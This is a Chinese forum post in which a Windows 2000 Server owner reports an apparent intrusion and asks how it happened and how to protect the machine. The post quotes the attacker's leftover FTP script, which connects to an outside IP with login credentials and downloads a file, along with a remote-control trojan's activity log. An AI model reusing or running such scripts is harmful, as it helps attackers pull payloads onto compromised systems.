我想我的电脑被黑了!
上午,我的win2000 server启动并上网后。中途我一直没管它,下午因其他客户机上网速度很慢打开,发现进程中有很多FTP.EXE 和CMD.exe
C盘根目录下有四个文件,四个文本文件标题分别为1,2,3,ra_slave另一个文件为一个应用程序名称为dare.exe
1,2,3文本的内容为:
open 61.132.102.88
tty1688
lovetty
bin
lcd c;\
lcd c:\
get a.txt c:\a.txt
ra_slave文本内容为:
[01/12/04 19:10:36]
[01/12/04 19:10:36]
[01/12/04 19:10:36] --[Run]--
[01/12/04 19:10:36] 2000 build 2195 Service Pack 4
[01/12/04 19:10:36] Admin: y
[01/12/04 19:10:36] 3.8.26
[01/12/04 19:10:36] Path: C:\WINNT\Slave.exe
[01/12/04 19:10:36] COMCTL32 v5.81 Win2K
[01/12/04 19:10:36] server 192.168.0.1
[01/12/04 19:10:36] ---- RunServer
[01/12/04 19:10:36] Main:NT
[01/12/04 19:10:40] *Conn with 240.64.144.0 Closed
[01/12/04 19:10:40] *Conn with 255.255.255.255 Closed
[01/12/04 19:10:40] Start
[01/12/04 19:10:40] CH:Daemon
[01/12/04 19:10:40] FB:Daemon
[01/12/04 19:10:40] RC:Daemon
[01/12/04 19:10:41] 00-E0-4C-A1-02-47,,192.168.0.1,server,4000,Not Logged,00:01:09,2000 Server build 2195 Service Pack 4,GenuineIntel x86 Family 15 Model 1 Stepping 2 1700Mhz,290MB/384MB,C: 6.64GB/9.31GB; D: 10.27GB/13.96GB; E: 3.62GB/6.51GB; F: 6.89GB/12.10GB; G: 6.70GB/7.91GB; H: 3.13GB/7.41GB,OFF,-
[01/12/04 19:10:42] *Conn with 112.66.144.0 Closed
[01/12/04 19:10:42] FB:initOK
[01/12/04 19:10:42] FB:Wait
[01/12/04 19:11:56] User: Not Logged => Administrator
请问,此黑客是如何攻进我的电脑的,我要如何作防范措施。我的服务器只开放了80,138,139端口。